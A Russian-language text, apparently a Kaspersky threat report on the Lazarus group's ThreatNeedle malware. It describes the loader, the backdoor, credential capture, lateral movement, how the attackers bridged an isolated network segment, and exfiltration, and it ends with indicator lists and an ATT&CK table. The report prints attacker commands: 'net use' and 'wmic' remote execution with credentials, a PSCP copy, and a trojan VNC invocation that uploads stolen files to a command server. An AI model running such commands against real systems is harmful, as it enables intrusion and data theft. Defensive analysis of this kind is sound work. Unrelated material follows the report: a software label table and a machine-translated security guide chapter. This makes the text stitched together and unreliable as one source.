Большинство образцов загрузчика ThreatNeedle проверяют параметр командной строки и выполняют последовательность вредоносных действий только в том случае, если указан соответствующий параметр. Это общая черта загрузчиков ThreatNeedle. Наиболее распространенная версия загрузчика работает аналогично инсталлятору ThreatNeedle – вредоносное ПО расшифровывает внедренную строку, используя алгоритм RC4, и при запуске сравнивает ее с параметром «Sx6BrUk4v4rqBFBV». В случае совпадения строк вредоносное ПО начинает расшифровку бэкдора, находящегося в исполняемом файле загрузчика, используя тот же ключ RC4. Расшифрованный бэкдор – это архивный файл, который затем распаковывается. Далее вредоносное ПО ThreatNeedle загружает бэкдор в память и запускает его.

Другой вариант загрузчика извлекает бэкдор из реестра зараженной системы. Согласно результатам анализа, данный ключ реестра создается компонентом-инсталлятором ThreatNeedle. Данные, извлеченные из реестра, расшифровываются алгоритмом RC4 и затем распаковываются. Далее они загружаются в память и запускаются на выполнение.

Бэкдор ThreatNeedle

На последнем этапе атаки запускается бэкдор ThreatNeedle. Данный компонент вредоносной программы предназначен для скрытого удаленного управления зараженной системой. Он обладает развитой функциональностью, в частности, злоумышленники могут передавать следующие команды вредоносной программе:

  • Операции с файлами/директориями.
  • Сбор информации о зараженной системе (профилирование).
  • Управление процессом вредоносной программы.
  • Вход в режим сна или гибернации.
  • Обновление настроек вредоносной программы.
  • Выполнение команды командной строки, полученной с сервера управления вредоносным ПО.

Действия злоумышленников после заражения

По результатам анализа одной из систем мы обнаружили, что злоумышленники применяли средство сбора учетных данных, известное как Responder, и заражали новые компьютеры в сети, используя инструменты Windows. Группировке Lazarus удалось преодолеть сегментацию сети и вывести данные из полностью отделенного сегмента сети, не имевшего соединения с интернетом, скомпрометировав виртуальную машину-маршрутизатор, как описано ниже в разделе «Преодоление сегментации сети».

Исходя из того, на каких системах злоумышленники запускали бэкдор ThreatNeedle после первичного заражения, мы предполагаем, что основной целью данной атаки была кража интеллектуальной собственности. В конце атаки украденные данные выводились на сервер злоумышленников при помощи специальной утилиты, которая будет описана в разделе «Вывод украденных данных». Ниже показана примерная хронология расследованной нами атаки:

Хронология атаки

Сбор аутентификационных данных

В процессе расследования мы обнаружили, что утилита Responder выполнялась на одной из систем, которые ранее стали получателями фишинговых писем. На следующий день после первоначального заражения оператор вредоносного ПО разместил эту утилиту на данной системе и запустил ее на выполнение следующей командой:

  • [Путь к файлу утилиты Responder] -i [IP адрес] -rPv

Через несколько дней после этого злоумышленник начал процесс заражения других компьютеров сети с этой системы. Поэтому мы считаем, что атакующим удалось получить аутентификационные данные, использовавшиеся на этой системе, после чего они начали использовать их для распространения вредоносного ПО в сети организации.

Заражение других компьютеров в сети

После получения учетных данных злоумышленники начали расширять свое присутствие в сети как на рабочих станциях, так и на серверах. Они применяли стандартные методы получения доступа к новым компьютерам с использованием утилит Windows. Вначале с помощью команды «net use» устанавливалось сетевое соединение с удаленной системой.

  • net use \\[IP адрес]\IPC$ «[пароль]» /u:»[имя пользователя]» > $temp\~tmp5936t.tmp 2>&1″

Далее злоумышленники копировали вредоносное ПО на удаленную систему, используя командную строку WMIC (Windows Management Instrumentation Command-line).

  • wmic.exe /node:[IP адрес] /user:»[имя пользователя]» /password:»[пароль]» PROCESS CALL CREATE «cmd.exe /c $appdata\Adobe\adobe.bat«
  • wmic.exe /node:[IP адрес] /user:»[имя пользователя]» /password:»[пароль]» PROCESS CALL CREATE «cmd /c sc queryex helpsvc > $temp\tmpdat«

Преодоление сегментации сети

В ходе исследования мы обнаружили ещё одну интересную технику, использованную злоумышленниками для получения контроля над другими компьютерами в сети и вывода украденных данных. Сеть атакованного предприятия была разделена на два сегмента: корпоративный (сеть, компьютеры которой имеют доступ к интернету) и изолированный (сеть, компьютеры которой содержат конфиденциальные данные и не имеют доступа к интернету). При этом, согласно корпоративным политикам, любая передача информации между этими сегментами запрещена, другими словами, сегменты должны были быть полностью разделены.

Изначально злоумышленникам удалось проникнуть на системы, подключенные к интернету, и длительное время они распространяли вредоносное ПО между компьютерами корпоративного сегмента сети. В числе зараженных систем оказались и компьютеры, используемые администраторами IT-инфраструктуры предприятия.

Интересен тот факт, что рабочие станции администраторов имели возможность подключения к системам как корпоративного, так и изолированного сегментов сети. Администраторы использовали данную возможность для настройки систем и оказания технической поддержки пользователям в обеих зонах. Таким образом, взяв под контроль рабочие станции администраторов, злоумышленники получили возможность доступа к изолированному сегменту сети.

Однако из-за того, что прямая маршрутизация трафика между сегментами сети была невозможна, злоумышленники не могли использовать свой обычный набор вредоносного ПО для передачи данных, украденных с систем изолированного сегмента, на сервер управления вредоносным ПО.

Ко второму июля ситуация изменилась: злоумышленникам удалось получить учетные данные для подключения к роутеру, используемому администраторами для подключений к системам обоих сегментов. Данный роутер по сути являлся виртуальной машиной на базе CentOS и отвечал за маршрутизацию трафика между несколькими сетевыми интерфейсами по заданным правилам.

Схема подключений между сегментами сети атакованной организации

Согласно собранным уликам, злоумышленники выполнили сканирование портов роутера и обнаружили веб-интерфейс Webmin. После этого злоумышленники выполнили вход в веб-интерфейс под учетной записью привилегированного пользователя root. Достоверно не известно, как злоумышленникам удалось получить данные этой учетной записи, наиболее вероятно, что они были сохранены в хранилище паролей браузера на одной из зараженных систем.

Лог событий аутентификации в веб-интерфейсе Webmin

Получив доступ к панели конфигурации, злоумышленники настроили веб-сервер Apache, и с этого момента роутер стал выполнять роль прокси-сервера между корпоративным и изолированным сегментами сети организации.

Список сервисов, используемых на роутере

Через несколько дней после этого, 10 июля 2020 года, злоумышленники подключились к роутеру по SSH и настроили утилиту PuTTy PSCP (клиент PuTTY Secure Copy client) на одной из зараженных машин. Данную утилиту они использовали для загрузки вредоносного ПО на виртуальную машину, выполняющую функцию роутера. Это позволило злоумышленникам разместить вредоносное ПО на системах в изолированном сегменте сети предприятия, используя роутер как хостинг вредоносных образцов. Кроме того, вредоносные программы, запущенные в изолированном сегменте сети, получили возможность отправлять собранные данные на командный сервер через веб-сервер Apache, настроенный на том же роутере.

Новая схема подключений после вмешательства злоумышленников

В ходе расследования мы обнаружили образцы вредоносных программ, содержащие в своём коде URL-адрес роутера, используемого в качестве прокси-сервера.

Адрес прокси-сервера, заданный в исполняемом файле вредоносной программы

Из-за того, что злоумышленники регулярно удаляли лог-файлы, находящиеся на роутере, удалось восстановить лишь небольшую часть команд, которые были введены в командную строку через SSH. Анализ этих команд говорит о том, что злоумышленники пытались перенастроить маршрутизацию трафика, используя команду route.

Команды, выполненные злоумышленниками

Помимо этого, злоумышленники запускали на виртуальной машине, служившей роутером, утилиту nmap и проводили сканирование портов систем, находящихся в изолированном сегменте сети предприятия. 27 сентября злоумышленники приступили к полной зачистке следов своего присутствия на роутере. В частности, была использована утилита logrotate для настройки автоматического стирания лог-файлов.

Лог Webmin

Вывод украденных данных

Мы отметили, что оператор вредоносного ПО пытался создать SSH-туннели к удаленному серверу, находящемуся в Южной Корее, с нескольких скомпрометированных серверов. Для этого использовался нестандартный инструмент туннелирования сетевого трафика. Данный инструмент принимает четыре параметра: IP-адрес клиента, порт клиента, IP-адрес сервера и порт сервера. Данный инструмент обладает скромной функциональностью – он предназначен для пересылки сетевого трафика с одной системы на другую. Для создания скрытого канала связи вредоносное ПО шифрует пересылаемый трафик, используя тривиальный алгоритм.

Процедура шифрования

Используя скрытый канал связи, злоумышленники переносили данные с зараженного сервера на систему в корпоративном сегменте сети предприятия. Для этого применялась утилита PuTTy PSCP:

  • %APPDATA%\PBL\unpack.tmp  -pw [пароль] [email protected][IP адрес]:/tmp/cab0215 %APPDATA%\PBL\cabtmp

После копирования данных с зараженного сервера злоумышленники использовали специализированную утилиту для загрузки украденных данных на свои серверы.

Данная программа выглядит как легитимный клиент VNC и, будучи запущен без параметров командной строки, выполняется так же, как легитимное приложение VNC.

Интерфейс утилиты при запуске вредоносной программы без параметров

При этом если данное приложение запущено с определенными параметрами командной строки, оно выполняет альтернативную, вредоносную функциональность. По данным телеметрии защитных решений «Лаборатории Касперского», злоумышленники выполняли данное приложение со следующими 6 параметрами:

%APPDATA%\Comms\Comms.dat S0RMM-50QQE-F65DN-DCPYN-5QEQA  hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp %APPDATA%\Comms\cab59.tmp FL0509 15000

Если число аргументов командной строки превышает шесть, данная утилита переходит к выполнению вредоносной составляющей. Если длина второго аргумента менее 29 символов – вредоносная программа завершается. В случае успешной проверки параметров вредоносное ПО приступает к расшифровке своего следующего модуля.

Внедренный в файл вредоносный компонент расшифровывается путем выполнения операции XOR, где каждый байт от конца вредоносного кода применяется к предыдущему байту. Затем к результату предыдущей операции применяется операция XOR со вторым аргументом командной строки (в данном случае S0RMM-50QQE-F65DN-DCPYN-5QEQA). Данное вредоносное ПО может принимать больше аргументов командной строки и выполняться по-разному в зависимости от числа полученных аргументов. Например, с помощью опции «-p» ему могут передаваться адреса прокси-серверов.

После запуска расшифрованный в памяти компонент вредоносной программы сравнивает заголовок переданных конфигурационных данных со строкой «0x8406» для подтверждения валидности данных. Вредоносная программа открывает заданный файл (в данном случае %APPDATA%\Comms\cab59.tmp) и приступает к отправке его содержимого на удаленный сервер. При отправке данных на командный сервер вредоносное ПО использует запросы HTTP POST с двумя параметрами: «fr» и «fp»:

  • Параметр «fr» содержит взятое из соответствующего аргумента командной строки имя файла, подлежащего отправке.
  • Параметр «fp» содержит закодированный в base64 размер, значение CRC32 для содержимого отправляемого файла, а также само содержимое файла.

Данные, передаваемые в параметре «fp«

Атрибуция

Мы следим за вредоносным ПО ThreatNeedle уже более двух лет и твердо уверены, что данный кластер вредоносного ПО может быть атрибутирован только группировке Lazarus. В процессе расследования нам удалось найти связи с несколькими кампаниями группировки Lazarus.

Связи между кампаниями Lazarus

Связь с кластером DeathNote

При проведении данного расследования мы обнаружили несколько связей с кластером DeathNote (он же Operation Dream Job) группировки Lazarus. Прежде всего, среди систем, зараженных вредоносным ПО ThreatNeedle, мы обнаружили одну, которая была также заражена вредоносным ПО DeathNote. При этом оба образца вредоносного ПО использовали одни и те же URL-адреса серверов управления.

Кроме того, при анализе сервера управления вредоносным ПО, который использовался в этой атаке, был обнаружен нестандартный веб-шелл скрипт, который был также обнаружен на сервере управления DeathNote. В дополнение к этому, на сервере управления DeathNode был обнаружен серверный скрипт, соответствующий модулю VNC с внедренным троянским функционалом.

Несмотря на то, что DeathNote и данный инцидент различаются по тактикам, методам и процедурам, обе кампании объединяют общая инфраструктура серверов управления и одинаковый подход к выбору жертв.

Связь с операцией AppleJeus

Мы также обнаружили связь с операцией AppleJeus. Как мы писали выше, злоумышленники использовали в кампании ThreatNeedle собственный инструмент туннелирования, в котором для создания скрытого канала связи применена нестандартная процедура шифрования. Тот же самый инструмент был применен и в операции AppleJeus.

Фрагмент кода инструмента туннелирования сетевого трафика

Связь с кластером Bookcode

В нашем предыдущем отчете о деятельности Lazarus мы упоминали, что кластер вредоносного ПО Bookcode относится к инструментарию этой преступной группировки. Недавно Агентство по интернету и безопасности Кореи (KISA) также опубликовало отчет об операции Bookcode. В своем отчете они упомянули кластер вредоносного ПО LPEClient, используемый для разделения зараженных систем по профилям и получения вредоносного ПО для следующих этапов атаки. В процессе расследования данного инцидента мы также обнаружили вредоносное ПО LPEClient на системе, зараженной ThreatNeedle. Таким образом, по нашей оценке, кластер ThreatNeedle связан с операцией Bookcode.

Выводы

В последние годы группировка Lazarus была сосредоточена на атаках на финансовые учреждения по всему миру. Однако с начала 2020 года злоумышленники начали активно атаковать предприятия оборонной промышленности. В этих атаках, целью которых является кибершпионаж, группировка Lazarus активно применяет вредоносное ПО ThreatNeedle, которое ранее использовалось для атак на криптовалютные компании.

Данное расследование позволило нам обнаружить тесные связи между различными кампаниями группировки Lazarus, подкрепляющие нашу атрибуцию. В этой кампании группировка Lazarus показала уровень своей изощренности и способность обходить меры безопасности, с которыми она сталкивается при проведении атак, – такие как сегментация сети. По нашим оценкам, Lazarus – чрезвычайно активная группировка, одновременно проводящая несколько кампаний, основанных на разных стратегиях. При этом для достижения своих целей они могут применять в нескольких кампаниях одни и те же инструменты и одну и ту же инфраструктуру.

Kaspersky ICS CERT благодарит за помощь Василия Бердникова (группа исследования целевых атак «Лаборатории Касперского»).

Вредоносные документы

Инсталлятор ThreatNeedle

Загрузчик ThreatNeedle

Загрузчик ThreatNeedle (версия с загрузкой вредоносного ПО из реестра)

Сетевой загрузчик ThreatNeedle

VNC-клиент с внедренным троянским функционалом

Инструмент туннелирования сетевого трафика

LPEClient

Пути к файлам
%SYSTEMROOT%\system32\bcdbootinfo.tlp
%SYSTEMROOT%\system32\Nwsapagent.sys
%SYSTEMROOT%\system32\SRService.sys
%SYSTEMROOT%\system32\NWCWorkstation.sys
%SYSTEMROOT%\system32\WmdmPmSp.sys
%SYSTEMROOT%\system32\PCAudit.sys
%SYSTEMROOT%\system32\helpsvc.sys

Ключи реестра
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\GameConfig — Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\KernelConfig — SubVersion

Доменные имена и IP адреса
hxxp://forum.iron-maiden[.]ru/core/cache/index[.]php
hxxp://www.au-pair[.]org/admin/Newspaper[.]asp
hxxp://www.au-pair[.]org/admin/login[.]asp
hxxp://www.colasprint[.]com/_vti_log/upload[.]asp
hxxp://www.djasw.or[.]kr/sub/popup/images/upfiles[.]asp
hxxp://www.kwwa[.]org/popup/160307/popup_160308[.]asp
hxxp://www.kwwa[.]org/DR6001/FN6006LS[.]asp
hxxp://www.sanatoliacare[.]com/include/index[.]asp
hxxps://americanhotboats[.]com/forums/core/cache/index[.]php
hxxps://docentfx[.]com/wp-admin/includes/upload[.]php
hxxps://kannadagrahakarakoota[.]org/forums/admincp/upload[.]php
hxxps://polyboatowners[.]com/2010/images/BOTM/upload[.]php
hxxps://ryanmcbain[.]com/forum/core/cache/upload[.]php
hxxps://shinwonbook.co[.]kr/basket/pay/open[.]asp
hxxps://shinwonbook.co[.]kr/board/editor/upload[.]asp
hxxps://theforceawakenstoys[.]com/vBulletin/core/cache/upload[.]php
hxxps://www.automercado.co[.]cr/empleo/css/main[.]jsp
hxxps://www.curiofirenze[.]com/include/inc-site[.]asp
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.digitaldowns[.]us/artman/exec/upload[.]php
hxxps://www.dronerc[.]it/forum/uploads/index[.]php
hxxps://www.dronerc[.]it/shop_testbr/Adapter/Adapter_Config[.]php
hxxps://www.edujikim[.]com/intro/blue/view[.]asp
hxxps://www.edujikim[.]com/pay/sample/INIstart[.]asp
hxxps://www.edujikim[.]com/smarteditor/img/upload[.]asp
hxxps://www.fabioluciani[.]com/ae/include/constant[.]asp
hxxps://www.fabioluciani[.]com/es/include/include[.]asp
hxxp://www.juvillage.co[.]kr/img/upload[.]asp
hxxps://www.lyzeum[.]com/board/bbs/bbs_read[.]asp
hxxps://www.lyzeum[.]com/images/board/upload[.]asp
hxxps://martiancartel[.]com/forum/customavatars/avatars[.]php
hxxps://www.polyboatowners[.]com/css/index[.]php
hxxps://www.sanlorenzoyacht[.]com/newsl/include/inc-map[.]asp
hxxps://www.raiestatesandbuilders[.]com/admin/installer/installer/index[.]php
hxxp://156.245.16[.]55/admin/admin[.]asp
hxxp://fredrikarnell[.]com/marocko2014/index[.]php
hxxp://roit.co[.]kr/xyz/mainpage/view[.]asp

Адреса серверов управления вредоносным ПО второго уровня
hxxps://www.waterdoblog[.]com/uploads/index[.]asp
hxxp://www.kbcwainwrightchallenge.org[.]uk/connections/dbconn[.]asp

URL-адреса серверов для сбора данных, украденных вредоносным VNC загрузчиком
hxxps://prototypetrains[.]com:443/forums/core/cache/index[.]php
hxxps://newidealupvc[.]com:443/img/prettyPhoto/jquery.max[.]php
hxxps://mdim.in[.]ua:443/core/cache/index[.]php
hxxps://forum.snowreport[.]gr:443/cache/template/upload[.]php
hxxps://www.gonnelli[.]it/uploads/catalogo/thumbs/thumb[.]asp
hxxps://www.dellarocca[.]net/it/content/img/img[.]asp
hxxps://www.astedams[.]it/photos/image/image[.]asp
hxxps://www.geeks-board[.]com/blog/wp-content/uploads/2017/cache[.]php
hxxps://cloudarray[.]com/images/logo/videos/cache[.]jsp

Приложение II – описание атаки согласно MITRE ATT&CK

Тактика Номер техники Название техники
Initial Access T1566.002 Phishing: Spearphishing Link
Execution T1059.003
T1204.002
T1569.002
Command and Scripting Interpreter: Windows Command Shell
User Execution: Malicious File
System Services: Service Execution
Persistence T1543.003
T1547.001
Create or Modify System Process: Windows Service
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation T1543.003 Create or Modify System Process: Windows Service
Defense Evasion T1140
T1070.002
T1070.003
T1070.004
T1036.003
T1036.004
T1112
Deobfuscate/Decode Files or Information
Clear Linux or Mac System Logs
Clear Command History
File Deletion
Masquerading: Rename System Utilities
Masquerading: Masquerade Task or Service
Modify Registry
Credential Access T1557.001 LLMNR/NBT-NS Poisoning and SMB Relay
Discovery T1135
T1057
T1016
T1033
T1049
T1082
T1083
T1007
Network Share Discovery
Process Discovery
System Network Configuration Discovery
System Owner/User Discovery
System Network Connections Discovery
System Information Discovery
File and Directory Discovery
System Service Discovery
Lateral Movement T1021.002 SMB/Windows Admin Shares
Collection T1560.001 Archive Collected Data: Archive via Utility
Command and Control T1071.001
T1132.002
T1104
T1572
T1090.001
Application Layer Protocol: Web Protocols
Non-Standard Encoding
Multi-Stage Channels
Protocol Tunneling
Internal Proxy
Exfiltration T1041 Exfiltration Over C2 Channel

AVConnect Online — сообщество пользователей AudienceView / createAccount.asp и createAccountWithOption.asp

Раздел Узел Ключ Метка по умолчанию
Название страницы/вкладки Application::Online::Accounts::Browser Titles Создать учетную запись Создайте учетную запись!
  Приложение::Клиент::Клиент Адрес поиска Адрес поиска
  Приложение::Онлайн::Навигация Создать учетную запись Создать учетную запись
Обмен сообщениями Application::Online::Messages Обязательное сообщение Звездочка указывает, что поле обязательно для заполнения.
Запомнить меня Application::Online::Accounts::Fields Запомнить меня Запомнить мое имя, адрес и контактную информацию для использования в будущем
Пароль Application::Online::Accounts Правила пароля Ваш пароль должен содержать хотя бы одну заглавную букву, хотя бы одну строчную букву, хотя бы одну цифру, хотя бы один символ и должен содержать не менее 7 символов.
Имя Application::Online::Accounts::Fields Имя Имя
  Бизнес-объекты::TScustomerBO::Contacts::Title Этикетка Титул
  Бизнес-объекты::TScustomerBO::Contacts::First Name Этикетка Имя
  Business Objects::TScustomerBO::Contacts::Middle Initial Этикетка Средний инициал
  Business Objects::TScustomerBO::Contacts::Last Name Этикетка Фамилия
  Бизнес-объекты::TScustomerBO::Contacts::Suffix Этикетка Суффикс
Адрес Application::Online::Accounts::Fields Адрес Адрес
  Бизнес-объекты::TScustomerBO::Addresses::Street Этикетка улица
  Бизнес-объекты::TScustomerBO::Addresses::City Этикетка Город
  Business Objects::TScustomerBO::Addresses::Province/State Этикетка Провинция/штат
  Бизнес-объекты::TScustomerBO::Addresses::Country Этикетка Страна
  Бизнес-объекты::TScustomerBO::Адреса::Почтовый индекс Этикетка Почтовый индекс
Телефон Application::Online::Accounts::Fields Телефон Телефон
  Business Objects::TScustomerBO::Contacts::Home Phone Этикетка Домашний телефон
  Business Objects::TScustomerBO::Contacts::Work Phone Этикетка Рабочий телефон
  Бизнес-объекты::TScustomerBO::Контакты::Мобильный телефон Этикетка Мобильный телефон
  Бизнес-объекты::TScustomerBO::Contacts::Fax Этикетка Факс
  Business Objects::TScustomerBO::Contacts::Phone 5 Этикетка Телефон 5
  Бизнес-объекты::TScustomerBO::Contacts::Телефон 6 Этикетка Телефон 6
Электронная почта Application::Online::Accounts::Fields Адрес электронной почты Адрес электронной почты
Пользовательские настройки Application::Online::Accounts::Названия разделов Настройки Настройки пользователя
  Бизнес-объекты::TScustomerBO::Пользователь::Имя пользователя Этикетка Имя пользователя
  Бизнес-объекты::TScustomerBO::Пользователь::Пароль Этикетка Пароль
  Business Objects::TScustomerBO::User::Подтверждение пароля Этикетка Подтвердите пароль
  Бизнес-объекты::TScustomerBO::Contacts::Email Этикетка Электронная почта
  Бизнес-объекты::TScustomerBO::Customer::Language Этикетка Язык
  Бизнес-объекты::TScustomerBO::Customer::Keywords Этикетка Ключевые слова
Маркетинг Application::Online::Accounts::Fields Маркетинг Маркетинг
  Application::Online::Accounts::Fields Параметры связи Параметры связи
  Application::Online::Accounts::Fields Маркетинговые предпочтения Маркетинговые предпочтения
  Business Objects::TScustomerBO::Marketing::Marketing Data 1-50 Этикетка Маркетинговые данные 1-50
  Application::Online::Accounts::Fields Варианты защиты данных Варианты защиты данных
Кнопки Приложение::Онлайн::Навигация Продолжить Продолжить
  Приложение::Онлайн::Навигация кнопка отмены Отменить

Безопасность доступа пользователей, из публикации Safeguarding Your Technology, NCES Publication 98-297 (Национальный центр статистики образования)

    ГЛАВА 8
Защита вашей системы:
Безопасность доступа пользователей
 
 
   

Лицо, нуждающееся в информации, было определено администрацией школы как имеющее законный образовательный или профессиональный интерес при доступе к записи.

 


Введение в безопасность доступа пользователей

Безопасность доступа пользователей относится к коллективным процедурам, с помощью которых авторизованные пользователи получают доступ к системе компьютера , а неавторизованные пользователи не допускаются к этому. Однако, чтобы сделать это различие немного более реалистичным, поймите, что безопасность доступа пользователей ограничивает даже авторизованных пользователей теми частями системы , которые им явно разрешено использовать (что, в свою очередь, основано на их «необходимости»). -знаю» ).В конце концов, нет никаких оснований для того, чтобы кто-то из отдела заработной платы персонала получал разрешение на доступ к конфиденциальным студенческим записям.

   

Это действительно происходит!

Ким осторожно подошла к Фреду. Как менеджер по безопасности, она знала, как важно полностью собрать информацию, прежде чем делать поспешные выводы. «Фред, мой просмотр наших компьютерных журналов показывает, что вы входили в систему и просматривали конфиденциальную информацию о студентах.Я не мог понять, зачем кому-то из отдела общественного питания просматривать результаты тестов отдельных учащихся, поэтому решил зайти и спросить вас».

Фред взглянул на Ким так, словно был удивлен, что задал такой вопрос. «Вы забыли, что у меня есть доступ к студенческим записям?»

«Вы имеете право на доступ к определенным элементам, которые касаются права студента на бесплатные и льготные обеды», — пояснила Ким. «Это предел ваших потребностей в знании.»

«Я не знал, что мой доступ ограничен», — честно заявил Фред. «Я подумал, что если мой пароль приведет меня к файлу, это будет честная игра».

Ким сделал паузу, поняв, что со стороны Фреда могло быть разумным предположить, что ему разрешено читать файл, если его пароль дает ему доступ. «Хм, я понимаю вашу точку зрения, Фред, но, по правде говоря, вы не должны получать доступ к информации об успеваемости, которая не связана с вашими законными образовательными обязанностями. На этот раз я не буду придавать этому большого значения, но от Теперь ограничьте просмотр информацией о бесплатных обедах и обедах по сниженным ценам.А пока я собираюсь разослать персоналу записку, напоминающую им, что на самом деле означает «необходимость знать».

«И вы, возможно, захотите пересмотреть, как работает наша система паролей», — добавил Фред. «Было бы мне было совершенно ясно, что мне нечего делать в файле, если мой пароль не позволит мне войти.»



Организация не может отслеживать действия пользователей, если только этот пользователь не предоставит на это явное или неявное разрешение!
   
Хотя нет никаких сомнений в том, что организация имеет право защищать свои вычислительные и информационные ресурсы посредством действий по обеспечению безопасности доступа пользователей, пользователи (независимо от того, авторизованы они или нет) также имеют права.Необходимо приложить разумные усилия, чтобы информировать всех пользователей, даже незваных хакеров , о том, что система находится под наблюдением и что несанкционированная деятельность будет наказана и/или привлечена к ответственности, если это будет сочтено целесообразным. Если такие усилия не будут предприняты, организация может фактически вторгнуться в права на неприкосновенность частной жизни своих злоумышленников!

Отличный способ должным образом информировать пользователей о действиях по наблюдению — это отображаемый им начальный экран. Читая предупреждение, подобное следующему, пользователи явным образом соглашаются как с условиями наблюдения, так и с наказанием при переходе к следующему экрану.Таким образом, первый экран, который видит любой пользователь, когда входит в защищенную компьютерную систему , должен быть примерно следующего содержания:


Никогда не включайте слово «Добро пожаловать» в процесс входа в систему — можно утверждать, что это означает, что любой, кто читает это слово, по определению приглашен для доступа к системе.
 

В А Р Н И Н Г ! Это сеть с ограниченным доступом.Использование этой сети, ее оборудования и ресурсов постоянно отслеживается и требует явного разрешения от сетевого администратора. Если у вас нет этого разрешения в письменной форме, вы нарушаете правила этой сети и можете и будете преследоваться в судебном порядке по всей строгости закона. Продолжая работу с этой системой, вы подтверждаете, что ознакомлены с этими условиями и согласны с ними.

     
   
     
  Часто задаваемые вопросы

В.Можно ли иметь безопасную систему, если у вас есть сотрудники, которые работают удаленно или работают по нестандартному графику?
А. Да. В то время как конкретные контрмеры , возможно, потребуется скорректировать для соответствия нетрадиционным графикам (например, практика ограничения пользователей допустимым временем и местом входа в систему), система с удаленными сотрудниками , частыми путешественниками и другим удаленным доступом пользователи по-прежнему могут быть в безопасности. Это может потребовать от разработчиков политики более творческого мышления, но каждое руководство по безопасности в любом случае должно быть адаптировано для удовлетворения потребностей организации (см. главу 2).

 

В. Является ли использование паролей эффективной стратегией защиты системы?
A. Тот факт, что системы паролей являются наиболее распространенной стратегией аутентификации , применяемой в настоящее время, не означает, что они стали менее эффективными. На самом деле причина их популярности именно в том, что они могут быть очень полезны для ограничения доступа к системе.Основное беспокойство в отношении систем паролей вызывает не их техническая целостность, а степень, в которой (как и многие стратегии) ​​они зависят от надлежащего применения пользователями. Хотя, безусловно, существуют более дорогие и даже эффективные способы ограничения доступа пользователей, если анализ Risk определяет, что система паролей отвечает потребностям организации и является наиболее рентабельной, вы можете быть уверены в защите паролей до тех пор, пока пользователи внедряют эту систему. должным образом, что, в свою очередь, требует соответствующей подготовки персонала (см. главу 10).

 

В. Необходимы ли все эти меры предосторожности, если организация доверяет своим сотрудникам?
А. Абсолютно. Хотя подавляющее большинство пользователей системы, вероятно, заслуживают доверия, это не означает, что они не боятся случайных компьютерных аварий. В конце концов, большинство системных проблем являются результатом человеческой ошибки. Внедряя процедуры безопасности, организация защищает не только систему и ее информацию, но и каждого пользователя, который в какой-то момент может непреднамеренно повредить ценный файл .Зная, что «их» информация хранится безопасным образом, сотрудники будут чувствовать себя более комфортно и уверенно в своих компьютерных операциях.

   

Инициирование процедур безопасности также приносит пользу пользователям:

1) Помощь им в защите их собственных файлов

2) Снижение вероятности их неправильного выпуска конфиденциальная информация

3) Обучение их тому, что считается и что не считается соответствующее поведение

     
   
     

Руководство по разработке политики безопасности можно найти в главе 3
  Вопросы политики

Безопасность доступа пользователей требует, чтобы все лица (или системы), которые используют ресурсы сети , должны были идентифицировать себя и доказать, что они на самом деле являются теми, за кого себя выдают.Пользователи впоследствии ограничиваются в доступе к тем файлам, которые им абсолютно необходимы для выполнения их рабочих требований, и не более того. Для этого лица, принимающие решения, должны установить политики, регулирующие системы учетных записей пользователей, методы аутентификации пользователей, процедуры входа в систему, требования физической безопасности и механизмы удаленного доступа.


Как более подробно обсуждалось в главе 2, угроза — это любое действие, действующее лицо или событие, которое способствует риску
 

Угрозы доступа пользователей (примеры)

Примеры угроз доступа пользователя включают в себя:
  • Умышленные действия (т.(например, общие учетные записи пользователей, взлом и пользователь , подделка или выдача себя за другое лицо)
  • Непреднамеренные действия (например, отсроченное удаление неактивных учетных записей, незащищенные пароли и неправильное управление оборудованием удаленного доступа)
     
   
   


Контрмеры безопасности доступа пользователей

Следующие контрмеры направлены на решение проблем безопасности доступа пользователей, которые могут повлиять на ваши сайты и оборудование.Эти стратегии рекомендуются, когда оценка риска выявляет или подтверждает необходимость противостоять потенциальным нарушениям доступа пользователей в вашей системе безопасности.


  Контрмеры бывают разных размеров, форм и уровней сложности. В этом документе предпринята попытка описать ряд стратегий, потенциально применимых к жизни в образовательных организациях. Чтобы сохранить эту направленность, сюда не включены те контрмеры, которые вряд ли будут применяться в образовательных организациях.Например, если после оценки рисков ваша группа безопасности решит, что вашей организации требуются высококлассные контрмеры, такие как сканеры сетчатки глаза или анализаторы голоса, вам нужно будет обратиться к другим справочным материалам по безопасности и, возможно, нанять надежного технического консультанта.


Выберите только те контрмеры, которые удовлетворяют предполагаемые потребности, определенные в ходе оценки риска (глава 2) или политики поддержки (глава 3).
  Реализуйте программу, в которой каждый пользователь получает доступ к системе посредством индивидуальной учетной записи:
  • Ограничьте доступ пользователей только к тем файлам, которые им нужны для выполнения их работы: Предоставление доступа, который не требуется, значительно увеличивает риск без соответствующего увеличения выгоды. Зачем беспокоиться?
  • Избегайте общих учетных записей : Индивидуальная деятельность не может быть дифференцирована, если нет индивидуальных учетных записей.
  • Защитите список имен учетных записей пользователей : Из-за важности для безопасности системы список учетных записей пользователей должен считаться конфиденциальным и никогда не должен публиковаться. Подумайте о том, чтобы сохранить его как зашифрованный файл.
  • Мониторинг активности учетной записи : Вести учет всего использования системы (многие системы выполняют эту функцию с помощью функции контрольного журнала ).
  • Удаление бездействующих учетных записей по истечении заданного периода бездействия (например,г., 30 дней) : Законные пользователи всегда могут повторно подать заявку и восстановить свои учетные записи.



См. в Главе 9 рекомендации по аутентификации сообщений, передаваемых по внешним сетям.
  Такие контрмеры, как биометрия, вероятно, выходят за рамки возможного (и необходимости) в большинстве, если не во всех, образовательных организациях.
 
Требовать от пользователей «аутентифицировать» себя для доступа к своим учетным записям (т. е. убедиться, что они доказывают, что они они выдают себя за таких):
  • Выберите систему аутентификации : Правильный выбор системы аутентификации зависит от потребностей организации и ее системы и должен основываться на результатах оценки рисков (см. главу 2).Обратите внимание, что следующие параметры меняются от наименее безопасных к наиболее безопасным, а также (что неудивительно) от наименее дорогих к наиболее дорогим:
    1. Что-то, что знает пользователь (например, пароль — см. например, электронный ключ-карта)
    2. Что-то, чем является пользователь (например, биометрические данные — отпечатки пальцев, распознавание голоса и геометрия руки)

Есть компромиссы, связанные с тем, что пароли труднее запомнить, чем кличку домашнего животного или инициалы человека (например,г., сотрудники чаще записывают напоминания о паролях). Затраты и выгоды от этих компромиссов следует учитывать при оценке рисков организации (см. главу 2).
 
